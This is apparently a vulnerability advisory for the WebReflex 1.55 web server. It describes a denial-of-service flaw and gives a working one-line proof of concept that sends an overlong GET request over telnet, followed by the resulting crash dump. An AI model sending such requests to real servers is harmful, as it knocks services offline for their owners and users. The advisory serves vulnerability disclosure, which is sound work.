COMMAND

    WebReflex

SYSTEMS AFFECTED

    WebReflex 1.55

PROBLEM

    'slipy' found following.  WebReflex  is an easy to use  web server
    that's  easy  to  set  up  and  use.   It has many features like a
    limitless  amount  of  concurrent  requests,  Drive  and directory
    lists,  Built  in  server  side  image-maps, Implementation of the
    CGI-WIN  standard,  User  defined  directory  index  files,   User
    defined error files, Built in MIME type mappings plus user defined
    mappings, Built  in server-  push using  sequence files,  Log file
    using the  common log  file format  and all  the rest.   The  best
    feature of this server is the ability to run it from a CD- ROM.

    WebReflex 1.55 is vulnerable to a simple Denial of Service  attack
    which  will  result  in  the  program causing a General Protection
    Fault  and  end  up  quiting  the  program.   WebReflex is for the
    Microsoft  (c)  operating  systems,  all  apear  to be vulnerable.
    Examples:

        echo "GET " `perl -e 'print "A" x 666'` | telnet 192.168.0.20 80

    Will cause the program to quit within seconds and display:

        REFLEX16 caused a general protection fault
        in module KRNL386.EXE at 0001:00008aee.
        Registers:
        EAX=86cf0000 CS=014f EIP=00008aee
        EFLGS=00000282 EBX=830f000a SS=86f7
        ESP=00008d86 EBP=00008da0 ECX=0000000a
        DS=0167 ESI=00009051 FS=0000 EDX=ffff8dae
        ES=86ef EDI=00008c82 GS=0000
        Bytes at CS:EIP:
        07 1f 61 c3 06 2e 8e 06 02 00 26 89 16 f4 12 26
        Stack dump:
        41414141 41414141 41414141 41414141 41414141
        41414141 41414141 41414141 41414141 41414141
        41414141 41414141 41414141 41414141 41414141
        41414141

SOLUTION

    Vendor has been notified, and waiting for reply.